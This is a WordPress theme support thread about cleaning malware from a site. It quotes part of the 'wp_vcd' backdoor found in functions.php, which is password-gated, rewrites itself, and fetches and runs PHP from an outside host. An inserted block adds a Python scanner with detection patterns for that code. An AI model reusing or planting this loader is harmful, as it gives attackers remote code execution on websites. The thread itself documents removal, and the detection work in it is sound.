Virus on my site..

  • #17825

    yvo010
    Participant

    Hi,
    Sorry for asking, I know it is not your job to help me with this, but I hope you can help me.

    I installed a plugin from the internet yesterday. And now there is a JavaScript virus on my site. I know how I can find the virus with the code inspector in Chrome:
    http://imgur.com/a/7cAma
    But I don’t know how I can remove it..

    Please help.
    Thanks!!

    #17830

    yvo010
    Participant

    Can you please help?

    #17838

    Artem Temos
    Keymaster

    Hello,

    Please, provide your FTP and WordPress admin access so we can check it.

    Kind Regards
    XTemos Studio

    #17842

    yvo010
    Participant

    Hello,
    Thanks for the help, really, thanks.

    #17843

    Eric Watson
    Participant

    Hello,

    Could you please describe in detail how to find the virus in the console? Please provide a link to the page with the virus.

    Kind Regards
    XTemos Studio

    #17847

    yvo010
    Participant

    Ok here it is:

    #17853

    Eric Watson
    Participant

    Sorry, but for us, everything is working and when we click on the menu there is no redirect.
    See the screencast
    https://gyazo.com/65ca87b83908c67ce1ab56a5c4e2d83b

    Kind Regards
    XTemos Studio

    #17855

    yvo010
    Participant

    Hi,
    Also when you are not logged in to WordPress?
    Try to use the website in an incognito window; the virus only works when you're not logged in as admin.

    I know that this: http://imgur.com/a/7cAma is the virus script..

    #17858

    yvo010
    Participant

    Hey,
    I think I fixed it already. But I don't know if it is the right way.
    Look, this was the virus:
    (see highlighted) http://imgur.com/a/ZSLat
    And now I did this with the link: (I added wrong info to the link)
    http://imgur.com/a/0z0Mk

    Do you think it is good? Or can I also remove it from functions.php without doing something wrong?

    #17859

    Eric Watson
    Participant

    Yes, you can safely remove this code because it does not apply to our theme.
    We are glad to hear that you found the solution to the problem. We can also recommend installing this plugin to avoid similar problems.

    https://wordpress.org/plugins/gotmls/

    Kind Regards
    XTemos Studio

    #17860

    yvo010
    Participant

    Hi, thank you very much.
    One more thing. Can you tell me what I need to delete exactly? Because I'm scared that I'll delete too much. :p

    This is the code:
    <?php

    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '12ac43c3e4d1377f2d2f98ec7b1f6c07'))
    {
        $div_code_name="wp_vcd";
        switch ($_REQUEST['action'])
        {

            case 'change_domain';
                if (isset($_REQUEST['newdomain']))
                {

                    if (!empty($_REQUEST['newdomain']))
                    {
                        if ($file = @file_get_contents(__FILE__))
                        {
                            if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code4\.php/i',$file,$matcholddomain))
                            {

                                $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                @file_put_contents(__FILE__, $file);
                                print "true";
                            }

                        }
                    }
                }
                break;

            default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
        }

        die("");
    }

    if ( ! function_exists( 'wp_temp_setup' ) ) {
        $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];

        if($tmpcontent = @file_get_contents("http://www.aotson.com/code499.php?i=".$path))
        {

            function wp_temp_setup($phpCode) {
                $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup");
                $handle = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
                fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }

    #17863

    yvo010
    Participant

    And one more thing,
    How can I change this color?
    http://imgur.com/a/JZm1E

    Thanks

    #17881

    Eric Watson
    Participant

    1) Yes, you can delete all this code because it does not relate to our theme.

    2) You can change the color in Dashboard -> Theme Settings -> Page heading -> Pages heading background
    See the screenshot: https://prnt.sc/gb2cd9

    Kind Regards
    XTemos Studio
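
A read-only check for the indicators visible in the code posted earlier in this thread, given here as an added example that is not part of any participant's post or of the theme's code. It reports the line numbers in PHP files that match those patterns; the `SAMPLE` text and the host `malware.example.invalid` are constructed for the demonstration, and the function names are assumptions.

```python
import re
from pathlib import Path

# Quote class: straight quotes plus the "smart" quotes forum software substitutes.
Q = r"""['"\u2018\u2019\u201c\u201d]"""
# Patterns modelled on the snippet posted in the thread.
INDICATORS = {
    "password-gated request handler": re.compile(
        r"\$_REQUEST\[" + Q + "password" + Q + r"\]\s*==\s*" + Q + "[0-9a-f]{32}" + Q, re.I),
    "wp_vcd marker": re.compile(r"wp_vcd", re.I),
    "self-modifying file write": re.compile(r"file_put_contents\(\s*__FILE__", re.I),
    "wp_temp_setup loader": re.compile(r"\bwp_temp_setup\b"),
    "remote code fetch": re.compile(
        r"file_get_contents\(\s*" + Q + r"https?://\S+?/code\d*\.php", re.I),
}

def scan_text(text):
    """Return (line_number, indicator_name) pairs found in PHP source text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in INDICATORS.items():
            if rx.search(line):
                hits.append((lineno, name))
    return hits

def scan_tree(root):
    """Scan every .php file under root; return {path: hits} for flagged files only."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample: a few lines shaped like the posted code, then a normal theme hook.
SAMPLE = """<?php
if (isset($_REQUEST['password']) && ($_REQUEST['password'] == '0123456789abcdef0123456789abcdef'))
{
$div_code_name="wp_vcd";
@file_put_contents(__FILE__, $file);
}
if ( ! function_exists( 'wp_temp_setup' ) ) {
if($tmpcontent = @file_get_contents("http://malware.example.invalid/code1.php?i=".$path))
{ } }
add_action( 'after_setup_theme', 'mytheme_setup' );
"""

if __name__ == "__main__":
    for lineno, name in scan_text(SAMPLE):
        print(f"line {lineno}: {name}")
```

Run `scan_tree` against the `wp-content` directory to list every flagged file, then compare the reported lines with a clean copy of the theme or plugin before deleting anything.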

    #17883

    yvo010
    Participant

    Hi,
    Thanks for the great support.
    Can you please copy+paste the code I can remove? I'm scared that I'll remove too much code.
    I don't understand PHP code.

    Thanks!

    #17884

    Eric Watson
    Participant

    We have removed the code on your site, check how it works now.

    Kind Regards
    XTemos Studio

    #17888

    yvo010
    Participant

    Thank you very much for helping!
    I will give a good rating on ThemeForest.

    Have a nice day
    Yvo

    #17889

    Eric Watson
    Participant

    You are welcome!
    Contact us if you have any additional questions or concerns.

    Kind Regards
    XTemos Studio